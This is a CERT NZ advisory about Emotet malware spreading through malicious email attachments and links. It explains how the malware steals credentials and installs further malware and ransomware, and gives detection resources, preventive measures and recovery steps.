Windows computers, networks and servers.
What this means
CERT NZ has seen an increase in Emotet activity in New Zealand, spreading via email. The emails contain malicious attachments or links that the receiver is encouraged to download. These links and attachments may look like genuine invoices, financial documents, shipping information, resumes, scanned documents, or information on COVID-19, but they are fake.
Emotet is designed to steal login credentials for email accounts configured on infected systems. The compromised credentials are subsequently passed to spam bots which send out large numbers of spam emails to further spread the malware. Or, they may steal information that’s in your mailbox, and use it to send emails from somewhere else. For example, they may use the content of an existing email conversation as a pretext to make the email look legitimate.
Emotet is also used to install other malware such as Trickbot and QBot onto a system. These may be used to provide access to attackers who carry out network compromise and data exfiltration, and often install ransomware such as Ryuk, Maze, Conti, or ProLock throughout a network.
What to look for
How to tell if you're at risk
Anyone can be targeted by Emotet, including individuals and businesses.
How to tell if you're affected
You may receive emails from people in your contact list advising that they’ve received phishing emails from you containing malware. As malware continues to evolve, anti-virus software does not always detect infections. The following sources provide information which may help you identify infected computers in your environment:
- Japan CERT publishes a tool that you can use to check for emotet infection on a computer:
https://github.com/JPCERTCC/EmoCheck External Link
- Check your egress network logs (http proxy, DNS logs) for any connection to known Emotet Command and Control (C2) hosts. A provider of lists of known malware C2 is Feodo Tracker: https://feodotracker.abuse.ch/browse/ External Link
- Urlhaus link as a feed of URLs associated with emotet:
https://urlhaus.abuse.ch/browse/tag/emotet/ External Link
- Cryptolaemus group provides up to date information about Emotet including IOC here: https://paste.cryptolaemus.com/ External Link
What to do
As Emotet is spread via documents with malicious macros, it is important that you take the following measures:
- Disable macros within MS Office. Only enable macros that are digitally signed or from trusted locations
- Ensure your anti-virus software on your endpoint device is active and up to date
- Restrict PowerShell to only executing signed scripts
- Apply the principles of least privilege
- Use of mail and web filters to block known Emotet documents and C2
- Application whitelisting
If your system has been affected by the Emotet malware, we recommend that you:
- Isolate the infected computer as soon as possible
- Check for any other infected computers in your environment
- Re-image and patch the computer(s)
- Change all credentials, especially local admin and domain admin passwords
- Notify everyone in your contact list and advise them not to open any attachments in emails that appear to have come from you
- Review your mail and web filtering solutions
- Review your antivirus solution
- Enable PowerShell command logging to let you detect infected computers
- Maintain an offline backup of your systems.
- Network segregation
If you require more information or further support, you can submit a report on our website or contact us on 0800 CERTNZ.
For media enquiries, email our media desk at firstname.lastname@example.org or call the MBIE media team on 027 442 2141.
Bleeping Computer -
- https://www.bleepingcomputer.com/news/security/emotet-malwares-new-red-dawn-attachment-is-just-as-dangerous/ External Link External Link
Darktrace Blog -